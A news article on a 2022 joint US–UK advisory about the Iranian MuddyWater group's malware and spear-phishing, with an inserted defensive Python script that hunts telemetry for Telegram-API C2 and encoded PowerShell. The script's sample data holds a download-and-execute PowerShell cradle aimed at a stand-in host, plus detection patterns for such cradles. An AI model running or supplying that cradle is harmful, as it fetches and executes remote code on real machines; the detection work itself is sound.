Iran’s MuddyWater Hacker Group Using New Malware in Worldwide Cyber Attacks

February 25, 2022

Cybersecurity agencies from the U.K. and the U.S. have laid bare new malware used by the Iranian government-sponsored advanced persistent threat (APT) group in attacks targeting government and commercial networks worldwide.

“MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors,” the agencies said.

The joint advisory comes courtesy of the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the U.K.’s National Cyber Security Centre (NCSC).


The cyberespionage actor was outed this year as conducting malicious operations as part of Iran’s Ministry of Intelligence and Security (MOIS), targeting a wide range of government and private-sector organizations, including the telecommunications, defense, local government, and oil and natural gas sectors, in Asia, Africa, Europe, and North America.


MuddyWater is also tracked by the wider cybersecurity community under the names Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros, with the group known for cyber offensives in support of MOIS objectives since roughly 2018.

In addition to exploiting publicly reported vulnerabilities, the group has historically been observed using open-source tools to gain access to sensitive data, deploy ransomware, and achieve persistence on victim networks.

A follow-on investigation by Cisco Talos late last month also uncovered a previously undocumented malware campaign aimed at Turkish private organizations and governmental institutions with the goal of deploying a PowerShell-based backdoor.

The new activities unmasked by the intelligence authorities are no different in that they make use of obfuscated PowerShell scripts to conceal the most damaging parts of the attacks, including command-and-control (C2) functions.

The intrusions are facilitated via a spear-phishing campaign that attempts to coax its targets into downloading suspicious ZIP archives that either contain an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious payload onto the infected system.

“Additionally, the group uses multiple malware sets — including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS — for loading malware, backdoor access, persistence, and exfiltration,” the FBI, CISA, CNMF, and NCSC said.


While PowGoop functions as a loader responsible for downloading second-stage PowerShell scripts, Small Sieve is described as a Python-based implant used to maintain a foothold in the network by leveraging the Telegram API for C2 communications in order to evade detection.

Other key pieces of malware are Canopy, a Windows Script File (.WSF) used to collect and transmit system metadata to an adversary-controlled IP address, and two backdoors called Mori and POWERSTATS that are used to run commands received from the C2 and maintain persistent access.

On top of that, MuddyWater has used a survey script to enumerate information about victim computers, which is then sent back to the remote C2 server. Also deployed is a newly identified PowerShell backdoor that is used to execute commands received from the attacker.
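As an added defender-side example (not from the advisory or this article), the Python below hunts constructed endpoint telemetry for two of the patterns described above: a non-browser process reaching the Telegram Bot API, as Small Sieve's C2 channel does, and PowerShell launched with an encoded command that hides a download cradle. The event records, process names, and hostnames are all constructed assumptions.

```python
"""Hunt constructed endpoint telemetry for two MuddyWater patterns from the
advisory: a non-browser process reaching the Telegram Bot API (Small Sieve
style C2) and PowerShell run with an encoded command hiding a download cradle."""
import base64
import re

def encode_ps(script):
    # PowerShell -EncodedCommand takes base64 of the UTF-16LE encoded script
    return base64.b64encode(script.encode("utf-16le")).decode()

# Constructed sample events, not real telemetry: (process image, command line, destination host)
SAMPLE_EVENTS = [
    ("chrome.exe", "chrome.exe --profile-directory=Default", "api.telegram.org"),
    ("python.exe", r"python.exe C:\Users\Public\update.py", "api.telegram.org"),
    ("powershell.exe", "powershell.exe -nop -w hidden -enc "
     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/a')"), "c2.invalid"),
    ("powershell.exe", r"powershell.exe -File C:\scripts\backup.ps1", "files.internal"),
]
# Processes from which Telegram API traffic is expected on a workstation (assumed baseline)
TELEGRAM_OK = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b", re.I)

def telegram_c2_suspect(image, host):
    """True when something other than a browser or Telegram client talks to the Bot API."""
    return host.lower() == "api.telegram.org" and image.lower() not in TELEGRAM_OK

def decode_encoded_command(cmdline):
    """Decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def encoded_cradle(image, cmdline):
    """PowerShell whose encoded command carries a download/execute cradle."""
    decoded = decode_encoded_command(cmdline) if image.lower() == "powershell.exe" else None
    return decoded is not None and CRADLE.search(decoded) is not None

def hunt(events):
    """Return (rule, image, detail) findings for every event matching a rule."""
    findings = []
    for image, cmdline, host in events:
        if telegram_c2_suspect(image, host):
            findings.append(("telegram_api_from_non_browser", image, host))
        if encoded_cradle(image, cmdline):
            findings.append(("encoded_powershell_cradle", image, decode_encoded_command(cmdline)))
    return findings
```

In production the same two rules would run over Sysmon process-creation and network-connection events, and the allowed-process baseline should be tuned per environment.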

To put up obstacles to potential attacks, the agencies recommend that organizations use multi-factor authentication wherever applicable, limit the use of administrator privileges, implement phishing protections, and prioritize patching known exploited vulnerabilities.



Some parts of this post are sourced from:
thehackernews.com

Copyright © TheCyberSecurity.News, All Rights Reserved.